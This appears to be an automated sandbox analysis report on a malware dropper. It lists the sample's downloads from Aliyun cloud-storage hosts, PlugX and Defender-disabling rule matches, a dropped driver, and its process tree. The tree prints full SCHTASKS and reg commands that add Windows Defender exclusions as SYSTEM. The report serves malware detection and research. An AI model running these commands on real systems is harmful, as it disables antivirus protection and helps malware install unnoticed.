Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: 3syd1z.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: 3syd1z.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: psffvt.net

Source: Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dll
Source: Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/%d.dllC:
Source: Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txt
Source: Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/ip.txtC:
Source: Nw13Wr.exe, Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rar
Source: Nw13Wr.exe, 00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s/upx.rarC:
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 0000000000000000.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: 0000000000000000.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: 0000000000000000.exe	String found in binary or memory: http://cipa.jp/exif/1.0/
Source: 0000000000000000.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 0000000000000000.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: 0000000000000000.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: qWXt7a.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: qWXt7a.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: 0000000000000000.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: 0000000000000000.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: 0000000000000000.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: qWXt7a.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: qWXt7a.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: qWXt7a.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 0000000000000000.exe	String found in binary or memory: http://upx.sf.net
Source: 0000000000000000.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: 0000000000000000.exe	String found in binary or memory: http://www.color.org)/S/GTS_PDFX/Type/OutputIntent
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 0000000000000000.exe	String found in binary or memory: http://www.extensis.com/meta/FontSense/
Source: 0000000000000000.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: 0000000000000000.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coW
Source: 0000000000000000.exe	String found in binary or memory: http://www.npes.org/pdfx/ns/id/
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: qWXt7a.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/F
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/L
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gif
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifhttps://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gift
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifz
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gif
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gif
Source: 0000000000000000.exe, 00000000.00000003.2132343159.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/iS
Source: 0000000000000000.exe, 00000000.00000003.2132388125.00000000005BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/p
Source: 0000000000000000.exe	String found in binary or memory: https://adoptium.net/
Source: 0000000000000000.exe	String found in binary or memory: https://adoptium.net/https://discord.gg/BdCcpDZ322562An
Source: qWXt7a.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: qWXt7a.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: qWXt7a.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: qWXt7a.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 0000000000000000.exe	String found in binary or memory: https://discord.gg/BdCcpDZ
Source: 0000000000000000.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987

Source: unknown	HTTPS traffic detected: 39.103.20.97:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49865 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.qWXt7a.exe.27c0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 39.2.Nw13Wr.exe.2fd0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: Process Memory Space: Nw13Wr.exe PID: 7976, type: MEMORYSTR	Matched rule: PlugX Identifying Strings Author: Seth Hardy

PE file contains section with special chars

Source: tbcore3U.dll.5.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.5.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.5.dr	Static PE information: section name: .mo:
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%?.
Source: tbcore3U.dll.39.dr	Static PE information: section name: .%-[
Source: tbcore3U.dll.39.dr	Static PE information: section name: .mo:

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_0000000140006C95 NtAllocateVirtualMemory,

4_2_0000000140006C95

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

4_2_0000000140001520

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_000000014000C3F0	4_2_000000014000C3F0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_000000014000CC00	4_2_000000014000CC00
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_0000000140001A30	4_2_0000000140001A30
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_000000014000C2A0	4_2_000000014000C2A0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00000001400022C0	4_2_00000001400022C0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00000001400110F0	4_2_00000001400110F0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_0000000140010CF0	4_2_0000000140010CF0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_0000000140009300	4_2_0000000140009300
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_000000014000BB70	4_2_000000014000BB70
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_0000000140003F80	4_2_0000000140003F80
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00000001400103D0	4_2_00000001400103D0
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00007FFE13210248	4_2_00007FFE13210248
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4_2_00007FFE1320A1B8	4_2_00007FFE1320A1B8
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Code function: 39_2_00BF4AE2	39_2_00BF4AE2
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Code function: 41_2_00944AE2	41_2_00944AE2

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722

Source: 0000000000000000.exe, 00000000.00000003.2171481530.0000000004948000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 0000000000000000.exe
Source: 0000000000000000.exe	Binary or memory string: OriginalFilenameSKlauncher 3.exe6 vs 0000000000000000.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Source: 4.2.qWXt7a.exe.27c0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 39.2.Nw13Wr.exe.2fd0000.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: Process Memory Space: Nw13Wr.exe PID: 7976, type: MEMORYSTR	Matched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal100.troj.evad.winEXE@64/29@14/3

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,

4_2_0000000140003F80

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,

4_2_0000000140001430

Source: C:\Users\user\Documents\qWXt7a.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\qWXt7a.exe

4_2_0000000140001520

Source: C:\Users\user\Documents\qWXt7a.exe

File created: C:\Program Files (x86)\Nw13Wr

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Mutant created: \Sessions\1\BaseNamedObjects\8.217.35.192:8917:Sauron
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Users\user\Desktop\0000000000000000.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Mutant created: \Sessions\1\BaseNamedObjects\aefd_760639
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2252:120:WilError_03
Source: C:\Users\user\Documents\qWXt7a.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Mutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:1704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2200:120:WilError_03

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Command line argument: tbcore3.dll	39_2_00BF1000
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Command line argument: tbcore3.dll	39_2_00BF1000
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Command line argument: tbcore3U.dll	39_2_00BF1000
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Command line argument: tbcore3U.dll	39_2_00BF1000
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Command line argument: tbcore3.dll	41_2_00941000
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Command line argument: tbcore3.dll	41_2_00941000
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Command line argument: tbcore3U.dll	41_2_00941000
Source: C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe	Command line argument: tbcore3U.dll	41_2_00941000

Source: 0000000000000000.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Documents\qWXt7a.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0000000000000000.exe	ReversingLabs: Detection: 15%
Source: 0000000000000000.exe	Virustotal: Detection: 19%

Source: Nw13Wr.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: Nw13Wr.exe	String found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
Source: Nw13Wr.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: Nw13Wr.exe	String found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
Source: Nw13Wr.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: Nw13Wr.exe	String found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
Source: 0000000000000000.exe	String found in binary or memory: " -jar ""--l4j-Startup error message not defined.Launcher:%s
Source: 0000000000000000.exe	String found in binary or memory: e_LowerCaseLongPathFF-ADDF
Source: 0000000000000000.exe	String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\0000000000000000.exe

File read: C:\Users\user\Desktop\0000000000000000.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0000000000000000.exe "C:\Users\user\Desktop\0000000000000000.exe"
Source: unknown	Process created: C:\Users\user\Documents\qWXt7a.exe C:\Users\user\Documents\qWXt7a.exe
Source: unknown	Process created: C:\Users\user\Documents\qWXt7a.exe C:\Users\user\Documents\qWXt7a.exe
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\qWXt7a.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
